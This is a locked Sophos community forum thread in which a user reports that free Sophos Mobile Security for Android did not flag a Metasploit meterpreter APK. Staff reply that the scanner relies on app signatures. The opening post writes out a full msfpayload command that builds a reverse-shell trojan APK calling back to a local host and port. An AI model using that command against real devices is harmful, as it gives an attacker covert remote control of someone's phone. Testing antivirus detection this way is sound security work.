Thread Info
  • State Not Answered
  • Locked Locked
  • Replies 4 replies
  • Subscribers 5 subscribers
  • Views 13086 views
  • Users 0 members are here
Options
Suggested
This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

Free Sophos Mobile Security can't detect a metasploit payload

oscarmrdc

Hi, today I have been testing sophos mobile security - free edition. 

Well,
I create a well-know "trojan" with metasploit:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 R > /root/Desktop/wifi.apk
I installed it on my cell phone (android with free sophos mobile security 3.1.1.1245)
configure metasploit with multihandler and of course get a reverse meterprete shell on metasploit.
And sophos mobile security didn't alert me about it.
It shows: "MainActivity successfully scanned / MainActivity is clean"
You can find more information about it on:
So, Why Sophos mobile security can't alert about a well-know and public "trojan"?
:1015937


This thread was automatically locked due to age.
  • 0

    Hi oscarmrdc,

    sorry for the late response.

    I am currently verifying this with our development team.


    Best regards

    Stefan

    :1016169
  • 0

    I am retiring my basic flip phone and joining the 21st Century with a new android phone.  One reason for my hesitation and delay in doing so has been security concerns.  The first app I am going to install will be an antivirus/security app.  Sophos mobile is in the top 3 following my research so I am very interested in the answer to this question. Anyone who has had the misfortune of finding a hacker/stalker in their lives or who has had their credit card number taken can relate to this concern.  I'm awaiting the answer to this.  I am also wondering about the other 2 contenders in my top 3.

    :1016253
  • 0

    Hi,

    speaking with development we currently do not provide a full detection based on behavior of applicaitons.

    Our scanner is based on signatures of apps. Therefore, it might be possible that an app is not recognized as malicious.

    It is currently planned to implement a full AV feature in a future version (hopefully) later this year to provide enhanced protection.

    Best regards

    Stefan

    :1016293
  • 0
    I like sophos free for android but there is a virus testing app "test virus" from "android antivirus pro" from play store that sophos failed to detect.
    :1017067
Unfiltered HTML